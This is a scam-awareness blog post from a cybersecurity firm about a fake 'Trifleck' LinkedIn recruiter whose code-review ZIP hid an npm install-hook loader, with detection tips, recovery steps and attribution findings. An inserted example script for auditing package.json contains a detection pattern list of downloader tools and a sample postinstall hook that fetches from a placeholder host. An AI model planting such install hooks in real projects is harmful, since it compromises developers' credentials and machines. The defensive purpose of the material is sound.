Scam Awareness

Fake LinkedIn Recruiter Malware Scam (Trifleck)

A LinkedIn recruiter from 'Trifleck' tried to install malware on a Bengaluru engineer. How to spot the pattern, what to do if hit, and the full forensic record.

Sai Samarth & Ashok Kamat
Cybersecify

Last updated 2026-05-20. The full forensic investigation (four-entity shell cluster, smoking-gun WHOIS, IOCs, attribution detail, evidence pack) now lives at /investigations/trifleck-shell-cluster/. This post is the buyer-facing summary plus action steps.

The short answer. A senior frontend engineer in Bengaluru was targeted by a fake LinkedIn recruiter pretending to work at a US software firm called Trifleck. The “code review” task before the technical interview was a malware ZIP. Trifleck has no verifiable business registration in Florida or Delaware, the recruiter’s photo was stolen from a 14-year-old Gravatar profile, and the company is one of four shell fronts that share registrar, nameservers, and an Iceland-proxied WHOIS. Two of the four domains were registered three hours apart. This is the publicly documented Contagious Interview campaign attributed by Microsoft, Mandiant, Palo Alto Unit 42, and the FBI to DPRK-aligned threat actors. Action steps follow below. For the full forensic record, read the investigation.

Key findings

  • One shell operator runs four entities (Trifleck, Fleck Publisher, Virginia Book Publisher, The Creative Unit). Two domains registered 3 hours 10 minutes apart on 2025-05-21, same registrar Namecheap, same Iceland privacy proxy, same DNS provider Vilords. No US business registration for Trifleck or Fleck Publisher.
  • The recruiter photo is reverse-image-traceable to a 14-year-old Gravatar account (pastorwynn), unambiguously predating the trifleck.com domain by more than a decade.
  • The malware vector is an npm preinstall or postinstall hook inside a Blockstar.zip codebase the recruiter sends as a pre-interview code review task. On npm install, the hook executes a loader that calls a command and control server.
  • The campaign cluster is attributed to DPRK threat actors by Microsoft (Sapphire Sleet), Palo Alto Unit 42 (CL-STA-0240), Mandiant (UNC5342), Trend Micro (Void Dokkaebi / Famous Chollima), and the FBI (TraderTraitor). Active since December 2022.
  • Defence: refuse pre-interview code review tasks, run npm install --ignore-scripts on every unverified codebase, inspect package.json scripts before extraction, reverse-image-search recruiter photos. Five habits defeat the entire variant family at zero cost.

Cybersecify is a Bengaluru-based cybersecurity firm. We verify suspicious recruitment outreach for engineers, founders, and individuals before files get clicked, free. The full forensic record on the Trifleck cluster (WHOIS pairing, employee profile analysis, infrastructure diagrams, IOCs, attribution detail) lives at the linked investigation, and a redacted sample pentest report shows the structure we use when our SaaS clients ask for evidence of malicious-package detection during third-party dependency reviews.

The setup

The target, who has shared his account publicly on LinkedIn, is Anil N, a senior frontend engineer with fifteen years of experience including time at io.net and Vimeo. On May 6 2026, he received a LinkedIn connection request and direct message from a person named John Burleson, claiming to be COO at a company called Trifleck.

The opening message read:

“Hi, @Anil N. Glad to know you on LinkedIn. Are you able to work remotely? Hiring for a Frontend expert ($50-$100/h) at Trifleck. Trifleck is a B2B software development and digital growth partner helping businesses design, build, and scale high-impact digital products. Your background looks like a strong match. Would you be open to hearing a bit more about the role?”

The pay range was above market. The company description was clean and plausible. The pitch did not feel like a scam at first read.

Over the next 24 hours, the conversation moved through a familiar recruitment arc. Burleson asked a few screening questions, sent a project brief PDF, scheduled a call through a second persona’s Calendly, and shared a Google Drive ZIP labeled Blockstar.zip with explicit instructions to read the README first.

The README, when extracted in a safe environment, contained a single instruction: run git checkout dev to access the latest MVP. The malicious payload lived in that dev branch. VirusTotal flagged the archive under the Trojan-Downloader.Shell.Agent family. On npm install, a preinstall or postinstall hook would have executed a loader that called a remote command and control server and pulled follow-on stages.

He recognised the pattern in time and did not run the code. What follows is the action sequence: how to spot this pattern before you click, what to do if you have already run the code, and how to get verification help.

How to spot this pattern before you click

A few rules that would have caught this scam at multiple stages.

Verify the recruiter against the company. A real recruiter is on the company’s LinkedIn employee list. If they are not, ask why. “I don’t use LinkedIn often” is not an acceptable answer from a recruiter, and “check again” two minutes later is operator behavior, not real-person behavior.

Verify the company against business registries. A real company in the United States, United Kingdom, Singapore, or Australia has a business registration you can look up in 30 seconds through the relevant state or national registry. A real company in India has a CIN you can verify on the MCA portal. Polished websites cost a few hundred dollars and a weekend. Business registrations cost more and take longer.

Treat unsolicited recruitment that skips resume review as a strong signal. Real recruiters want your CV before they hand you assignments. If a recruiter is sending you the project codebase before reading your resume, the goal is not hiring.

Inspect archives without extracting locally. Use an online archive viewer or a disposable VM. Read package.json first. Look at every entry under scripts. If prepare, postinstall, or preinstall invoke something you did not expect, stop and read what they invoke before going further.

Treat any “review the codebase before the interview” instruction with suspicion. This is the single most consistent fingerprint of the Contagious Interview campaign across all documented variants. Legitimate companies do not require local execution of an unvetted codebase as a pre-interview screening step.

If you fit the targeting profile (current or former crypto firm employee, Web3 developer, holder of crypto), treat all unsolicited recruitment with extra skepticism for the next 24 months. This campaign cluster has been documented continuously since December 2022. There is no sign of it slowing down.

What to do if you have already run the code

If you have already cloned the repository and run npm install, treat this as a confirmed compromise and move fast.

  1. Disconnect the machine from the network immediately. Pull the ethernet cable, turn off Wi-Fi. Stop further exfiltration.
  2. Rotate every credential the machine had access to. Browser-saved passwords. Cloud CLI tokens (AWS, GCP, Azure). SSH keys. GitHub personal access tokens. npm publish tokens. API keys in .env files. Anything the shell environment had read access to should be considered compromised.
  3. Move funds from a clean device if crypto wallet seed phrases were on the machine. Assume any wallet extension data is compromised. Use a different, clean computer to access wallet recovery, and move funds to a new wallet whose seed phrase was never on the affected device.
  4. Reimage the machine. Do not clean it. A compromised endpoint is not trusted recovery infrastructure. Persistence mechanisms can survive AV cleanup. Full reimage is the only safe path forward.
  5. Going forward, run npm install --ignore-scripts on any codebase from an unverified source. Lifecycle hooks will not fire automatically. You can rebuild specific packages manually with npm rebuild <package> once you have inspected them. This single habit defeats the entire family of preinstall/postinstall malware.
  6. Notify your employer’s security team. If the affected machine had access to corporate resources, treat this as a corporate incident, not a personal one. Time to disclosure matters.
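The "read package.json first and look at every entry under scripts" check from the spotting rules, and the --ignore-scripts habit from step 5, as an added example that is not code from the original post: a small Node script that lists the npm lifecycle hooks an archive's package.json would run automatically and flags the ones whose command looks like a downloader. The suspicious-pattern list and the sample package.json are constructed for this example, not taken from the Blockstar archive.

```javascript
// Added example (not from the original post): audit the "scripts" block of a
// package.json for npm lifecycle hooks that run without being asked on
// `npm install`, and flag hooks whose command looks like a loader/downloader.
// Usage: node audit-scripts.js path/to/package.json   (no path: audits SAMPLE)

// Hooks npm runs automatically during install/prepare.
const LIFECYCLE_HOOKS = [
  "preinstall", "install", "postinstall",
  "preprepare", "prepare", "postprepare", "prepublish",
];

// Command fragments that honest install hooks rarely need.
// Heuristic list, an assumption of this example; tune to your environment.
const SUSPICIOUS = [
  /\bnode\s+-e\b/, /\bcurl\b/, /\bwget\b/, /\bbase64\b/, /\beval\b/,
  /https?:\/\//, /\bpowershell\b/, /\bsh\s+-c\b/, /\bbash\s+-c\b/,
];

// Returns one finding per lifecycle hook present:
// { hook, command, suspicious, reasons } (reasons = matched pattern sources).
function auditLifecycleScripts(packageJsonText) {
  let pkg;
  try {
    pkg = JSON.parse(packageJsonText);
  } catch (e) {
    // Unparseable package.json is itself a reason to stop and look.
    return [{ hook: "(parse error)", command: String(e.message),
              suspicious: true, reasons: ["invalid JSON"] }];
  }
  const scripts = (pkg && typeof pkg.scripts === "object" && pkg.scripts) || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    if (typeof scripts[hook] !== "string") continue;
    const command = scripts[hook];
    const reasons = SUSPICIOUS.filter((re) => re.test(command)).map((re) => re.source);
    findings.push({ hook, command, suspicious: reasons.length > 0, reasons });
  }
  return findings;
}

// True if any auto-run hook exists at all. The post's advice is to read every
// such hook before going further, whether or not it matches a pattern.
function hasAutoRunHooks(packageJsonText) {
  return auditLifecycleScripts(packageJsonText).length > 0;
}

// Constructed sample package.json (invented for this example): a normal build
// script plus a postinstall hook that fetches something from the network.
const SAMPLE = JSON.stringify({
  name: "sample-frontend",
  scripts: {
    build: "vite build",
    postinstall: "node -e \"require('https').get('http://example.invalid/x')\"",
  },
});

if (typeof require !== "undefined" && require.main === module) {
  const fs = require("fs");
  const text = process.argv[2] ? fs.readFileSync(process.argv[2], "utf8") : SAMPLE;
  for (const f of auditLifecycleScripts(text)) {
    console.log(`${f.suspicious ? "SUSPICIOUS" : "present   "} ${f.hook}: ${f.command}`);
  }
}
```

Running it against the package.json pulled from an archive viewer (before any local extraction) tells you what `npm install` would execute; `npm install --ignore-scripts` is what keeps those hooks from firing while you read them.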

If you need help with forensic confirmation or with rotating credentials at scale, reach out via the verification line below. We can help you scope what was likely accessed and walk through the rotation sequence.

Not Sure If Your Recruiter Is Real?

Send us the recruiter’s name, their LinkedIn URL, the company they claim to represent, and any file or link they shared. We will tell you if it’s a real recruitment process or a scam.

No charges. No judgment.

What Happens When You Contact Us

  • We do not report you to the police
  • We do not ask for documents or payments
  • We do not interrogate or judge
  • We only verify whether it’s real or a scam

Need Help Beyond Verification?

If you have already lost money or credentials, or need help with FIR filing or reporting through the National Cybercrime Portal (cybercrime.gov.in), reach out via the same WhatsApp number. Evidence preservation and complaint assistance is a paid service.

What the investigation found (summary)

The full forensic record is at /investigations/trifleck-shell-cluster/. The headlines:

  • Trifleck is one of four shell entities sharing infrastructure: Trifleck, Fleck Publisher, Virginia Book Publisher, and The Creative Unit. All four surfaced in each other’s LinkedIn “Pages people also viewed” sidebar. Two of them list the identical street address (8201 Greensboro Dr, McLean VA 22102). The Creative Unit’s LinkedIn page has been deleted entirely.
  • The structural smoking gun: trifleck.com and fleckpublisher.com were registered three hours and ten minutes apart on the same day (2025-05-21), with the same registrar (Namecheap), behind the same anonymous Icelandic privacy proxy (Withheld for Privacy ehf), using the same budget DNS provider (Vilords). This is shared-operator evidence at a level that does not require LinkedIn correlation to interpret.
  • No business registration in Florida or Delaware under Trifleck or Fleck Publisher. The trifleck.com Terms of Service ships with literal unfilled (email address) and (business address) template placeholders in Section 14.
  • The recruiter’s photo was stolen from a 14-year-old Gravatar account (pastorwynn), unambiguously predating the trifleck.com domain by more than a decade.
  • Workforce composition does not match the claimed business: 9 HR, 8 business development, 5 IT, 5 sales at a claimed B2B software development agency. More HR staff than engineers.
  • Backdated tenures: four employees in four different countries with identical “5 years 1 month” tenure at a company whose domain is twelve months old.
  • Both recruiter personas were deleted from LinkedIn after our Day 1 inquiry was sent.
  • Blockstar Corporation in Chicago is a real and unrelated company (blockchain services firm founded 2020). The malicious project pretext name Blockstar.zip does not connect to them in any way.

The Trifleck / Blockstar instance had not appeared in any prior public report. Our investigation is the first public record of this specific cluster and the structural shared-infrastructure evidence tying the four entities to a single operator.

This is the publicly documented Contagious Interview campaign, attributed by Microsoft Threat Intelligence (Sapphire Sleet), Palo Alto Unit 42 (CL-STA-0240), Mandiant (UNC5342), Trend Micro (Void Dokkaebi / Famous Chollima), the FBI (TraderTraitor), and multiple other security vendors to DPRK-aligned threat actors. The campaign has been continuously active since December 2022 and shows no signs of slowing.

Who we are

Cybersecify is a Bengaluru-based cybersecurity consultancy. We help engineers, founders, and individuals verify suspicious recruitment outreach, suspicious calls, suspicious messages, and suspicious files before they turn into financial or operational damage.

We are not police. We are not a takedown service. We verify.

Disclaimer

This writeup is for public awareness. Cybersecify is an independent cybersecurity consultancy and is not affiliated with or endorsed by any law enforcement or government agency. For the avoidance of doubt: Blockstar Corporation, a Chicago-based blockchain services firm founded in 2020 that focuses on real estate tokenization, is a real and unrelated company. The reused project pretext name Blockstar.zip does not connect to Blockstar Corporation in any way. The full disclaimer and audit trail live in the investigation.

For emergencies or legal reporting in India, contact official authorities or use the National Cybercrime Helpline 1930.

Frequently Asked Questions

What is the Trifleck fake recruiter scam?

Trifleck is a shell front used in a publicly documented DPRK-aligned recruitment lure called the Contagious Interview campaign. A LinkedIn recruiter claiming to work at a US software firm called Trifleck approaches an engineer with an above-market remote role, then sends a code review task (named Blockstar in the documented case) that contains an npm preinstall or postinstall hook. The hook executes a loader on npm install, calls out to a command and control server, and pulls follow-on malware stages. The company has no verifiable business registration, the recruiter photo is stolen from an old Gravatar account, and the domain shares registrar, nameservers, and Iceland-proxied WHOIS with three sister shell entities registered within hours of each other.

Who is the DPRK Contagious Interview campaign targeting?

Current and former crypto firm employees, Web3 developers, blockchain engineers, and software engineers with publicly visible LinkedIn profiles signalling crypto wallet access or production credential access. Microsoft Threat Intelligence tracks the cluster as Sapphire Sleet. Palo Alto Unit 42 tracks it as CL-STA-0240. Mandiant tracks it as UNC5342. Trend Micro tracks it as Void Dokkaebi or Famous Chollima. The FBI tracks it as TraderTraitor. The campaign has been continuously active since December 2022 and has not slowed. If your LinkedIn profile signals crypto firm tenure, Web3 protocol work, or DevOps access to production crypto infrastructure, treat all unsolicited recruitment with extra skepticism for the next 24 months.

What do I do if I already ran the Blockstar code on my machine?

Treat the machine as confirmed compromised. Disconnect from the network immediately by pulling ethernet and turning off Wi-Fi. Rotate every credential the machine had access to: browser-saved passwords, cloud CLI tokens (AWS, GCP, Azure), SSH keys, GitHub personal access tokens, npm publish tokens, API keys in .env files. Move funds from a clean device if crypto wallet seed phrases were on the machine. Reimage the device, do not clean it. Persistence mechanisms can survive AV cleanup. Notify your employer security team if corporate resources were reachable. Going forward, run npm install with the --ignore-scripts flag on any codebase from an unverified source.

How do I spot a fake LinkedIn recruiter before clicking?

Six checks defeat almost all variants. One, verify the recruiter against the company employee list on LinkedIn. Two, verify the company against the relevant business registry (US state Secretary of State, UK Companies House, Singapore ACRA, Australia ASIC, India MCA portal). Three, treat unsolicited recruitment that skips resume review as a strong signal. Four, inspect any archive without extracting locally; read package.json first, look at every script entry, refuse anything with preinstall or postinstall hooks invoking unfamiliar binaries. Five, refuse the review-the-codebase-before-the-interview ask. Six, reverse image search the recruiter photo through Google Images or TinEye. The Trifleck case failed checks 2, 4, and 6.

What are the structural signs that Trifleck and Fleck Publisher are the same operator?

Five pieces of shared infrastructure tie the four shell entities (Trifleck, Fleck Publisher, Virginia Book Publisher, The Creative Unit) to one operator. trifleck.com and fleckpublisher.com were registered three hours and ten minutes apart on 2025-05-21 with the same registrar Namecheap, behind the same anonymous Icelandic privacy proxy Withheld for Privacy ehf, using the same budget DNS provider Vilords. Two entities list the identical street address 8201 Greensboro Dr McLean VA 22102. All four surfaced in each other’s LinkedIn “Pages people also viewed” sidebar. No business registration exists for Trifleck or Fleck Publisher in Florida or Delaware. The trifleck.com Terms of Service ships with literal unfilled (email address) and (business address) template placeholders. The full evidence pack, including WHOIS records, registration timestamps, employee profile screenshots, and infrastructure diagrams, lives in the linked investigation.

Is Blockstar Corporation in Chicago involved in this scam?

No. Blockstar Corporation is a real and unrelated Chicago-based blockchain services firm founded in 2020 focused on real estate tokenization. They have a verifiable business presence, active executive team, and legitimate operations. The malicious project pretext name Blockstar.zip used in the Trifleck lure does not connect to Blockstar Corporation in any way. This article and the linked forensic investigation explicitly clarify the lack of connection to protect the real Blockstar Corporation from reputation harm caused by the pretext reuse.

How do I verify recruitment outreach for free?

Cybersecify runs a free verification service for suspicious recruitment messages. Send the recruiter name, their LinkedIn URL, the company they claim to represent, and any file or link they shared via WhatsApp to +91 99644 43350 or email help@cybersecify.com. We tell you whether the pattern matches a known scam cluster (Contagious Interview, Trifleck shell family, OPSEC-failed crypto recruitment fronts) or whether the recruitment looks real. No charges, no judgment, no police escalation. Verification is the only output. If you need hands-on incident response after running malicious code, evidence preservation, or coordinated credential rotation at scale, that becomes a paid engagement; we scope it case by case and tell you honestly whether we can help.

What internal habits stop preinstall and postinstall malware?

Two habits defeat the entire malware family. First, run npm install --ignore-scripts on every codebase from an unverified source. Lifecycle hooks (preinstall, install, postinstall, prepare) will not fire automatically. You can rebuild specific packages manually with npm rebuild package-name once you have inspected each one. Second, do every unfamiliar codebase exploration inside a disposable VM or container with no network access to your credential stores. The disposable environment is the difference between a five-minute investigation and a five-day incident response. Both habits cost nothing to adopt and are zero-friction for legitimate work.

How does the Contagious Interview campaign filter for Web3 and crypto targets?

Three filtering signals appear consistently across documented Contagious Interview variants. One, the LinkedIn profile signals current or former crypto firm tenure, Web3 protocol development, blockchain engineering, or smart contract auditing experience. Two, the profile shows DevOps or platform engineering roles with implied production credential access at a target firm. Three, the public engagement pattern (LinkedIn posts, GitHub commits, conference talks) signals active employment rather than between-jobs status. The recruitment lure is tuned to the same profile across operators: an above-market remote role with an early code review task, often labelled as a frontend or full-stack assignment but containing crypto-adjacent dependencies in package.json. The selection bias is the goal: filter for credential-rich targets at crypto-adjacent firms where the malware payoff (wallet seed phrases, production cloud credentials, signing keys) justifies the social engineering cost. Microsoft, Mandiant, Palo Alto Unit 42, Trend Micro, and the FBI have all published indicator sets confirming this targeting pattern.

Where is the full forensic record on the Trifleck shell cluster?

The complete forensic investigation lives at /investigations/trifleck-shell-cluster/ on cybersecify.com. It includes the four-entity shell cluster mapping (Trifleck, Fleck Publisher, Virginia Book Publisher, The Creative Unit), the smoking-gun WHOIS pairing (trifleck.com and fleckpublisher.com registered 3 hours 10 minutes apart on 2025-05-21 with identical registrar Namecheap, identical Iceland privacy proxy Withheld for Privacy ehf, identical DNS provider Vilords), employee profile analysis (9 HR, 8 business development, 5 IT, 5 sales workforce composition mismatch at a claimed B2B software development agency), backdated tenure evidence (four employees in four different countries with identical 5 years 1 month tenure at a 12-month-old domain), recruiter photo reverse-image-search results (14-year-old Gravatar account pastorwynn), and the Indicators of Compromise (IOCs) pack. Microsoft Threat Intelligence Sapphire Sleet, Palo Alto Unit 42 CL-STA-0240, Mandiant UNC5342, Trend Micro Void Dokkaebi / Famous Chollima, and FBI TraderTraitor attribution detail is included with primary-source links.

Need help verifying a scam?

Free verification and knowledge sharing. WhatsApp +91 99644 43350 or email help@cybersecify.com. For active fraud in the last 24 hours, call the National Cybercrime Helpline 1930 first.
